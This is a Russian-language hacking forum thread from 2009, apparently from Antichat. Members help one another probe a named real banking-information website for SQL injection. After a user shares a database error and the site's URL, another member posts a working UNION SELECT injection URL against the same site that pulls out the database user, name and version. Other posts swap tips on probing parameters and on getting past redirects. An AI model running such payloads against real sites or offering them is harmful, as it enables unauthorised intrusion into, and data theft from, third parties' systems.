11.04.2009, 21:36
|
|
Познающий
Регистрация: 05.04.2009
Сообщений: 71
С нами:
9000055
Репутация:
5
|
|
Сообщение от farex
а заключить в код - не судьба не как..?
не прокатывает
Последний раз редактировалось massovka; 12.04.2009 в 11:06..
|
|
|
11.04.2009, 22:48
|
|
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
С нами:
9030403
Репутация:
146
|
|
Вот это сойдёт как sql инекция?Если да, то что можно сделать?
Error text: sql: Can't execute SQL command [ SELECT DTitle, DShort, DId, CShort FROM pshop_Docs, pshop_DocsCategories WHERE DType=9 AND DShow=1 AND DRemoved=0 AND CId=9 ORDER BY DId DESC LIMIT -10,10 ] [ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10,10' at line 1 ] (SHtml, (eval 9), 76)
|
|
|
|
11.04.2009, 22:59
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами:
9204308
Репутация:
256
|
|
Сообщение от navigat0r
Вот это сойдёт как sql инекция?Если да, то что можно сделать?
Error text: sql: Can't execute SQL command [ SELECT DTitle, DShort, DId, CShort FROM pshop_Docs, pshop_DocsCategories WHERE DType=9 AND DShow=1 AND DRemoved=0 AND CId=9 ORDER BY DId DESC LIMIT -10,10 ] [ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10,10' at line 1 ] (SHtml, (eval 9), 76)
да, хотя дай линк, точно сказать нельзя...
|
|
|
|
11.04.2009, 22:56
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Ну да, если даные передаешь ТЫ!
|
|
|
|
11.04.2009, 23:16
|
|
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
С нами:
9030403
Репутация:
146
|
|
http://www.site.ru/events/?page=1
при подстановке "-" перед 1 выскакивает это сообщение
|
|
|
|
11.04.2009, 23:41
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами:
9035873
Репутация:
317
|
|
Попробуй вместо - ,поставить 9999 (разумеется вместо 1)
Дай линк.......
Если не хочеш светить всем, скинь каму нить в ПМ....
Вариантов много может быть..
Последний раз редактировалось farex; 11.04.2009 в 23:44..
|
|
|
|
11.04.2009, 23:58
|
|
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
С нами:
9030403
Репутация:
146
|
|
http://www.mir-bankov.ru/events/?page=1
|
|
|
|
12.04.2009, 00:21
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
Сообщение от navigat0r
http://www.mir-bankov.ru/events/?page=1
Инъекция после лимита при наличии ордер бая невозможна
Но ты рано сдался и выложил ссылку =( Тут работают лучшие телепаты страны
|
|
|
|
12.04.2009, 04:04
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
С нами:
9076508
Репутация:
169
|
|
Код:
http://www.mir-bankov.ru/glossary/?letter=99%C7'+union+select+convert(concat_ws(0x3a,user(),database(),version())+using+cp1251),2,3/*
|
|
|
|
12.04.2009, 08:10
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Что делать если при SQL-inj (при ошибке похоже) идёт редерект на index.php ?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид
